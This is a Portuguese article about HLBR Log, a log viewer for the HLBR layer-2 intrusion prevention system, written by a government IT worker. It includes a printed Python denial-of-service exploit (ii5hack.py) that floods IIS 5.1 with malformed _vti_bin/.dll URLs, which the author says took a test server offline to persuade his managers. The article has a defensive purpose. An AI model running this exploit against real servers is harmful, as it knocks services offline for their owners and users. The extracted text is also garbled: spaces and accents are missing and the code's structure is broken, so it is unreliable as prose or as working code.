Você está na página 1de 5

HLBRLog(UmaalternativaparagerenciaroHLBR)

OHLBRLogumsoftwarequetemcomofinalidadegerenciaroHLBR.OHLBRumprojetobrasileiroderivado do Hogwash (desenvolvido por Jason Larsen). Este projeto destinado segurana em redes de computadores. OHLBR (HogwashLightBR)um IPS (Intrusion Prevention System)capazdefiltrarpacotesdiretamentena camada2domodeloOSI(nonecessitadeendereoIPnamquina).Adetecodetrfegomalicioso baseada em regras simples (o prprio usurio poder confeccionar novas regras). bastante eficiente e verstil,podendoserusadoatmesmocomobridgeparahoneypotsehoneynets.Comonousaapilha TCP/IPdosistemaoperacional,ele"invisvel"aoutrasmquinasnaredeeatacantes. PreciseiimplementarumasoluodeIPSnogoverno(TribunaldeContasdoEstadodoAmazonas),foiquando conhecioHLBR.ExistiaumservidorwebIIS(numw2kserver)quesempreeraalvodeataques,ficandodevez emquandoforadoar.Propusparaosmeussuperiores,configurarumservidordeaplicaes(ZOPE/Plone) atrs de um Linux/Apache, para aumentar a segurana, mas como o pessoal que cuidava do site, no queriamaprenderumanovatecnologia,entoconfigureioHLBRcomoumabridgeentreoRoteadoreo Firewall,emantiveoIIS.Eosproblemasamenizaram,poisoHLBRvemcominmerasregrascontraataques servidoresweb,sendoquehumagrandefacilidadeparaconfeccionarsuasprpriasregras.Masantesde implementar a soluo tive que convenclos que mesmo atrs de um firewall, um servidor web ou um servidordeemail,podeservtimadeumataquebemsucedido.Entoescreviumexploit(ii5hack.py)paratirar umservidorwebIISdoar(fizissosparademonstrarparaadiretoria).ComotinhaoWindowsXPSP2instalado nomeulaptopemdualbootcomumadistroLinux,aproveiteioIIS5.1quevemnoCDdeinstalaodoXPefiz umdemonstraodeumataqueporexploitmesmoestandoatrsdeumfirewall:
import urllib2, random, sys pasta = random.choice(['_vti_bin','_sharepoint']) ascii = random.choice(['%3f','"','*',':','<','>']) barras = random.choice(['\\','/']) numeros = str(random.choice(xrange(10))) def main(): if len(sys.argv) < 3: sys.exit()

alvo = sys.argv[1] contador = int(sys.argv[2]) for n in range(1,contador): try: url = urllib2.build_opener() except:

url.open('http://' + alvo + '/' + pasta + '/.dll/' + ascii + barras + '~' + numeros) print "Tentando derrubar o IIS..."

print "\n### Concluido! ###" if __name__ == "__main__": main()


1

Desferioataque:

Oataquefoibemsucedido:

Eoservidorwebsaiudoar.EntoelesmedeixaramimplementaroHLBR. Mashaviaumproblema.QuandoprecisavamostrarosataquesqueoHLBRhaviaimpedido,paraosmeus superiores,quenoeramescovadordebits,elesficavammeiofrustradoscomaaparnciadasadadoslogs:

Poisestavamacostumadoscomalgumaferramentaqueexibisseosdadosdeformaelegante.Poiscomandos numterminal,noalgomuitoagradvelparaumDiretordeTI. FoientoquandodecididesenvolveroHLBRLog.MascomooHLBRnotemTCP/IP,comopoderiafazeralgo estilooSARGouMYSARqueexibeoslogsdosquiddeformaorganizada,eatquesimptica?Eleinvisvel! Trabalhaemcamada2!ComofareialgoparecidocomoSARGouMYSAR? Foi quando tive a idia de instalar um ambiente grfico na mquina onde o HLBR est rodando. Mas o servidor X no abre portastcp?Isso nobom parasegurana! Masissosvlidoquando voc est trabalhandoemcamada3!ComooHLBRnousaTCP/IP,entoissonoumproblema.Aprimeiraversodo HLBR Log, eu fiz em Python com ZOPE, mas ficou um pouco pesado. Ento decidi fazer em Python com Apache:

ComooHLBRnotrabalhaemcamada3,nopossvelacessaroHLBRLogremotamente,comooSARGou MYSAR,masnotoinconvenienteacessarlocalmenteoslogsdoHLBR.Essepreodainvisibilidade.A seguranatemumpreo,eseopreoforacessaroslogsdeumIPSlocalmente,ouseja,namquinaonde eleestinstalado,euachoquevaleapena. Abaixoseguealgumassadasdelogs(reais!numambientedeproduo!),doHLBRLog:

Atofinaldesteano(2007)estareiliberandooHLBRLogparauso.Embreveoprojetoestarhospedadoem: http://hlbrlog.sourceforge.net ParasabermaissobreoHLBR: http://hlbr.sourceforge.net OuaSeoSeguranadaRevistaLinuxMagazine:HogwashLightBR,oIPSinvisvel(Invisivelmente),pp.6669, Edio35,Outubrode2007,Autor:RogerioFerreira.

RogerioFerreira http://rogerioferreira.objectis.net rogeriotux@gmail.com 559291232569